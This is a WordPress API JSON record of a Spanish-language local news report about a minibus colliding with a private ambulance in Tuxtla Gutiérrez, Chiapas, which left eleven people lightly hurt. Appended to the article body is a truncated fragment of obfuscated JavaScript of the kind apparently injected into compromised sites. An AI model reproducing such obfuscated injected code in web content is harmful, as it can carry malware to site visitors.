{"id":6293,"date":"2022-11-01T04:51:22","date_gmt":"2022-11-01T04:51:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6293"},"modified":"2022-11-01T04:51:23","modified_gmt":"2022-11-01T04:51:23","slug":"colectivo-choca-contra-ambulancia-hay-11-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6293","title":{"rendered":"Colectivo choca contra ambulancia, hay 11 heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1667278240660.jpg\" alt=\"\" class=\"wp-image-6294\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1667278240660.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/FB_IMG_1667278240660-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 31 de octubre del 2022. Tuxtla Guti\u00e9rrez. Tuxtla Guti\u00e9rrez.-Un choque entre un colectivo de la ruta 15 y n\u00famero econ\u00f3mico 12 contra una ambulancia privada en el Barrio San Francisco de Tuxtla Guti\u00e9rrez, dej\u00f3 11 heridos.<\/p>\n\n\n\n<p>Este siniestro ocurri\u00f3 este lunes cuando la Urvan circulaba sobre la 21 Sur y al llegar a la 1a Oriente con preferencia y la unidad de emergencias pas\u00f3 sin precauci\u00f3n originando la colisi\u00f3n.<\/p>\n\n\n\n<p>Por el fuerte impacto, los pasajeros del colectivo salieron volando de sus asientos.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil municipal para valorar a los heridos.<\/p>\n\n\n\n<p>Afortunadamente, ninguno de los pasajeros present\u00f3 heridas de consideraci\u00f3n por lo que no fueron traslados a un nosocomio.<\/p>\n\n\n\n<p>En el lugar el conductor de la ambulancia garantiz\u00f3 el pago de los da\u00f1os y las unidades involucradas fueron trasladadas a un taller para su reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 31 de octubre del 2022. Tuxtla Guti\u00e9rrez. Tuxtla Guti\u00e9rrez.-Un choque entre un colectivo de la ruta 15 y n\u00famero econ\u00f3mico 12 contra una ambulancia privada en el Barrio San Francisco de Tuxtla Guti\u00e9rrez, dej\u00f3 11 heridos. Este siniestro ocurri\u00f3 este lunes cuando la Urvan circulaba sobre la 21 Sur y al &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6294,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-6293","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6293"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6293\/revisions"}],"predecessor-version":[{"id":6295,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6293\/revisions\/6295"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6294"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}